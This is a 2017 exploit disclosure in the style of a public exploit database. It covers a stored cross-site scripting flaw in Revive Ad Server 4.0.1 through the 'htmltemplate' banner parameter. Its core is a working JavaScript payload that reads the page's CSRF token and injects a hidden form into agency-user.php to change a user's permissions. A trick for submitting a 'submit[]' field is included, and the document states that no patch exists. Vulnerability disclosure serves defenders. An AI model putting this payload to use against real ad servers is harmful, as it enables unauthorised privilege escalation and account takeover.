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# Exploit Title: XSRF Stored Revive Ad Server 4.0.1
# Date: 24/04/2017
# Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT ---------------------------------------------------------------
# Exploit Title: XSRF Stored Revive Ad Server 4.0.1
# Date: 24/04/2017
# Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
# Vendor Website :
# Software download :
# Version: 4.0.1
# Tested on: Windows 7 x64 SP1 / Kali Linux

Description :

A vulnerability has been discovered in Revive Ad Server, which can be
exploited by malicious people to conduct cross-site scripting attacks.
When you create a banner using Generic HTML Banner, input

passed via the 'htmltemplate' parameter to '/banner-edit.php' is not

properly sanitised before being returned to the user (This is probably
expected as it's an html banner). But, this can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.

This XSS vector allow to execute scripts to gather the CSRF token

and submit a form to update user rights

Here's the script :

---------------------- Javascript-------------------------------

var tok = document.getElementsByName('token')[0].value;

var txt = '<form method="POST" id="hacked" action="agency-user.php">'
txt += '<input type="hidden" name="submit[]" value="1"/>'
txt += '<input type="hidden" name="token" value="' + tok + '"/>'
txt += '<input type="hidden" name="userid" value="2"/>'
txt += '<input type="hidden" name="email_address" value=""/>'
txt += '<input type="hidden" name="agencyid" value="1"/>'
txt += '<input type="hidden" name="permissions[]" value="10"/>'
txt += '</form>'

var d1 = document.getElementById('firstLevelContent');

d1.insertAdjacentHTML('afterend', txt);


---------------------- Javascript End-------------------------------

(little trick to submit a form that has a "submit" parameter, just use a
list "submit[]")

This will update user rights and allow to manage accounts

POC video :

Patch : No patch yet
